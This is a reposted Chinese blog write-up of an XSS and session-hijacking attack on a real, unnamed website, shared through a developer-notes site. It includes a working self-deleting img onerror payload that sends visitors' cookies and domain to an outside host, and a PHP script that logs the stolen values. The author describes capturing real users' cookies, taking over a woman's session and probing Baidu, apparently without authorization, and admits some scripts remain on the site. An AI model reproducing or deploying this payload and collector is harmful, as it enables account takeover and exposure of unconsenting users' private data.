热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

开发笔记:投稿一次不完整的XSS混合渗透测试记录

本文由编程笔记#小编为大家整理,主要介绍了投稿一次不完整的XSS混合渗透测试记录相关的知识,希望对你有一定的参考价值。
本文由编程笔记#小编为大家整理,主要介绍了投稿一次不完整的XSS混合渗透测试记录相关的知识,希望对你有一定的参考价值。



本文由WindPunish安全实验室 DXkite 同志投稿

编辑/审校: Index / Little_YangYang

【投稿】一次不完整的XSS混合渗透测试记录

第一次实地操作web渗透,啊哈哈,结果还是喜人的,本次web渗透成功的原因有两个:



1. XSS注入漏洞若干

为啥这么说勒?若干?反正不是第一次在这个网站上发现XSS漏洞了,想我当初把XSS当作一个玩具,咳咳,注入CSS样式表,发奇怪的帖子,就是自定义样式的帖子,嗯,后续和网站的客服妹子联系后修补了。看了《XSS跨站脚本攻击剖析与防御》后,才知道这个漏洞叫XSS注入漏洞,手痒痒,就再次对这个网站进行了测试,不测试不知道,已测试,我尼玛,先贴测试脚本.....

   Onerror="var s=document.createElement('script');

   s.setAttribute('src','//safe.atd3.cn/a?b='+document.domain+'&c='+document.COOKIE);

   var b=document.all[0];

   b.appendChild(s);

   b.removeChild(s);

   this.parentNode.removeChild(this);">

这是一个中规中矩的测试脚本,在网页中插入图片,由于图片没有指定的url然后会调用 onerror 事件,在 onerror 事件中会创建一个脚本链接,发出跨站请求,请求的查询字符为网页的 COOKIE 和域名反正这是我的一个简易后台代码,php做服务器端的:

$file_name='COOKIE.php';

if (!file_exists($file_name))

    file_put_contents($file_name,"

if (isset($_SERVER['QUERY_STRING']))

{   file_put_contents($file_name,'$a[]=\''.$_SERVER['QUERY_STRING']."';\n",FILE_APPEND);

}


好了,前期准备做好了,接下来开始注入测试,进入网站,直接插入一个简单的代码:


这个是用来测试XSS漏洞的,,由于篇幅原因,我直接拿最致命的XSS注入载体

---markdown编辑器来做示范吧,如图

【投稿】一次不完整的XSS混合渗透测试记录

咳咳,,嗯,我顺带回答了问题,看看注入后的效果

【投稿】一次不完整的XSS混合渗透测试记录

啥都木有,是不是插入失败了?不。脚本自我删除了,唯一的痕迹就在这里

【投稿】一次不完整的XSS混合渗透测试记录

然后,,我们去服务器看看,,由于时原因,我就没等这个小伙子再次访问这个页面了,拿个其他小伙子的截图凑合一下,额,四次捕获同一个小伙子

【投稿】一次不完整的XSS混合渗透测试记录

这是XSS注入的后果,成功拿到了COOKIE,可是高兴的太早了,,如果这样就可以过了,那标题就不是混合了,接下来是第二个成功原因 session fixation 漏洞



2. session fixation 攻击

第一次XSS攻击成功获取到了COOKIE,哎,还是说说这个玩意吧,
毕竟网站的开发者考虑到了XSS注入,却没关注到这点,开发者做过XSS防范,如图

【投稿】一次不完整的XSS混合渗透测试记录

看图 HTTP 的红色标记,,这个是标记了 HttpOnly 的COOKIE,通过这个,我们用脚本 document.COOKIE 获取的COOKIE就不完整了,如图:

【投稿】一次不完整的XSS混合渗透测试记录

可怕。我一直在想怎么绕过这个,,可惜哦。不可以。。
还有要吐槽的是那个箭头标注的COOKIE名,反正我盗取的COOKIE都一个样,,亏我还为他是随机生成的,哎

COOKIE不完整,经过测试,我发现只需要一个COOKIE就好了,

【投稿】一次不完整的XSS混合渗透测试记录

通过抓包软件,抓到的数据包可以证明:

【投稿】一次不完整的XSS混合渗透测试记录

然后还有更无语的,那个我特么则怎么都获取不到的HttpOnly的COOKIE直接出现在了返回的包里,也是没得讲了

【投稿】一次不完整的XSS混合渗透测试记录

就问傻不傻~!session fixation攻击,,?应该就是叫这个来着
咳咳咳。。。嗯,获取到的返回页面,再截图一个,

【投稿】一次不完整的XSS混合渗透测试记录

哎呀呀,居然是个妹子,,咳咳,单身30年,见谅(年18。。。。。
这次漏洞危险性已经可以得到证明了,说大不大,说小不小。嗯,已经和客服联系了,毕竟是朋友(关键是妹子:P),后续的自我复制就算了了。没必要搞得整个网站都挂上我的XSS不是么。
啊哈哈,好了,总结


3. 总结

在此次渗透过程中我使用了三种方式

在此次渗透过程中我使用了三种方式

1.XSS 注入

2.sessionfixation 探测

3.iframe 劫持

这个东西麽。网站对其有防范。。。就不截图了

在自己设置网站的过程中,应该注意的就是一些细节问题。咳,脑残的对百度进行了session fixation试探,删除一个COOKIE
直接变成了未登陆状态,咳,还意外发现了这个:

【投稿】一次不完整的XSS混合渗透测试记录
所以说,机会只留给那些有啥啥啥的人。别再感叹无法求职,或许你按一个
F12键,求职单就来了


【投稿】一次不完整的XSS混合渗透测试记录后续

【投稿】一次不完整的XSS混合渗透测试记录【投稿】一次不完整的XSS混合渗透测试记录

刚刚又去看了下盗取的后台,尽管和网站负责人交流过过后,还是有部分脚本没删除干净不过,怪我咯~

【投稿】一次不完整的XSS混合渗透测试记录

本文由WindPunish安全实验室 DXkite 同志投稿

未经本人许可,严禁转载!

如果您技术在身,欢迎加入WindPunish安全实验室的团队!

欢迎发送简历至 join@windpunish.net,愿与君共创所想


推荐阅读
  • 本文介绍了绕过WAF的XSS检测机制的方法,包括确定payload结构、测试和混淆。同时提出了一种构建XSS payload的方法,该payload与安全机制使用的正则表达式不匹配。通过清理用户输入、转义输出、使用文档对象模型(DOM)接收器和源、实施适当的跨域资源共享(CORS)策略和其他安全策略,可以有效阻止XSS漏洞。但是,WAF或自定义过滤器仍然被广泛使用来增加安全性。本文的方法可以绕过这种安全机制,构建与正则表达式不匹配的XSS payload。 ... [详细]
  • 这是原文链接:sendingformdata许多情况下,我们使用表单发送数据到服务器。服务器处理数据并返回响应给用户。这看起来很简单,但是 ... [详细]
  • 安卓select模态框样式改变_微软Office风格的多端(Web、安卓、iOS)组件库——Fabric UI...
    介绍FabricUI是微软开源的一套Office风格的多端组件库,共有三套针对性的组件,分别适用于web、android以及iOS,Fab ... [详细]
  • 本文介绍了Web学习历程记录中关于Tomcat的基本概念和配置。首先解释了Web静态Web资源和动态Web资源的概念,以及C/S架构和B/S架构的区别。然后介绍了常见的Web服务器,包括Weblogic、WebSphere和Tomcat。接着详细讲解了Tomcat的虚拟主机、web应用和虚拟路径映射的概念和配置过程。最后简要介绍了http协议的作用。本文内容详实,适合初学者了解Tomcat的基础知识。 ... [详细]
  • Webmin远程命令执行漏洞复现及防护方法
    本文介绍了Webmin远程命令执行漏洞CVE-2019-15107的漏洞详情和复现方法,同时提供了防护方法。漏洞存在于Webmin的找回密码页面中,攻击者无需权限即可注入命令并执行任意系统命令。文章还提供了相关参考链接和搭建靶场的步骤。此外,还指出了参考链接中的数据包不准确的问题,并解释了漏洞触发的条件。最后,给出了防护方法以避免受到该漏洞的攻击。 ... [详细]
  • 本文介绍了南邮ctf-web的writeup,包括签到题和md5 collision。在CTF比赛和渗透测试中,可以通过查看源代码、代码注释、页面隐藏元素、超链接和HTTP响应头部来寻找flag或提示信息。利用PHP弱类型,可以发现md5('QNKCDZO')='0e830400451993494058024219903391'和md5('240610708')='0e462097431906509019562988736854'。 ... [详细]
  • 单点登录原理及实现方案详解
    本文详细介绍了单点登录的原理及实现方案,其中包括共享Session的方式,以及基于Redis的Session共享方案。同时,还分享了作者在应用环境中所遇到的问题和经验,希望对读者有所帮助。 ... [详细]
  • position属性absolute与relative的区别和用法详解
    本文详细解读了CSS中的position属性absolute和relative的区别和用法。通过解释绝对定位和相对定位的含义,以及配合TOP、RIGHT、BOTTOM、LEFT进行定位的方式,说明了它们的特性和能够实现的效果。同时指出了在网页居中时使用Absolute可能会出错的原因,即以浏览器左上角为原始点进行定位,不会随着分辨率的变化而变化位置。最后总结了一些使用这两个属性的技巧。 ... [详细]
  • 本文介绍了前端人员必须知道的三个问题,即前端都做哪些事、前端都需要哪些技术,以及前端的发展阶段。初级阶段包括HTML、CSS、JavaScript和jQuery的基础知识。进阶阶段涵盖了面向对象编程、响应式设计、Ajax、HTML5等新兴技术。高级阶段包括架构基础、模块化开发、预编译和前沿规范等内容。此外,还介绍了一些后端服务,如Node.js。 ... [详细]
  • 如何提高PHP编程技能及推荐高级教程
    本文介绍了如何提高PHP编程技能的方法,推荐了一些高级教程。学习任何一种编程语言都需要长期的坚持和不懈的努力,本文提醒读者要有足够的耐心和时间投入。通过实践操作学习,可以更好地理解和掌握PHP语言的特异性,特别是单引号和双引号的用法。同时,本文也指出了只走马观花看整体而不深入学习的学习方式无法真正掌握这门语言,建议读者要从整体来考虑局部,培养大局观。最后,本文提醒读者完成一个像模像样的网站需要付出更多的努力和实践。 ... [详细]
  • 本文介绍了响应式页面的概念和实现方式,包括针对不同终端制作特定页面和制作一个页面适应不同终端的显示。分析了两种实现方式的优缺点,提出了选择方案的建议。同时,对于响应式页面的需求和背景进行了讨论,解释了为什么需要响应式页面。 ... [详细]
  • 本文介绍了RxJava在Android开发中的广泛应用以及其在事件总线(Event Bus)实现中的使用方法。RxJava是一种基于观察者模式的异步java库,可以提高开发效率、降低维护成本。通过RxJava,开发者可以实现事件的异步处理和链式操作。对于已经具备RxJava基础的开发者来说,本文将详细介绍如何利用RxJava实现事件总线,并提供了使用建议。 ... [详细]
  • Android实战——jsoup实现网络爬虫,糗事百科项目的起步
    本文介绍了Android实战中使用jsoup实现网络爬虫的方法,以糗事百科项目为例。对于初学者来说,数据源的缺乏是做项目的最大烦恼之一。本文讲述了如何使用网络爬虫获取数据,并以糗事百科作为练手项目。同时,提到了使用jsoup需要结合前端基础知识,以及如果学过JS的话可以更轻松地使用该框架。 ... [详细]
  • 目录浏览漏洞与目录遍历漏洞的危害及修复方法
    本文讨论了目录浏览漏洞与目录遍历漏洞的危害,包括网站结构暴露、隐秘文件访问等。同时介绍了检测方法,如使用漏洞扫描器和搜索关键词。最后提供了针对常见中间件的修复方式,包括关闭目录浏览功能。对于保护网站安全具有一定的参考价值。 ... [详细]
  • Apache Shiro 身份验证绕过漏洞 (CVE202011989) 详细解析及防范措施
    本文详细解析了Apache Shiro 身份验证绕过漏洞 (CVE202011989) 的原理和影响,并提供了相应的防范措施。Apache Shiro 是一个强大且易用的Java安全框架,常用于执行身份验证、授权、密码和会话管理。在Apache Shiro 1.5.3之前的版本中,与Spring控制器一起使用时,存在特制请求可能导致身份验证绕过的漏洞。本文还介绍了该漏洞的具体细节,并给出了防范该漏洞的建议措施。 ... [详细]
author-avatar
mobiledu2502926037
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有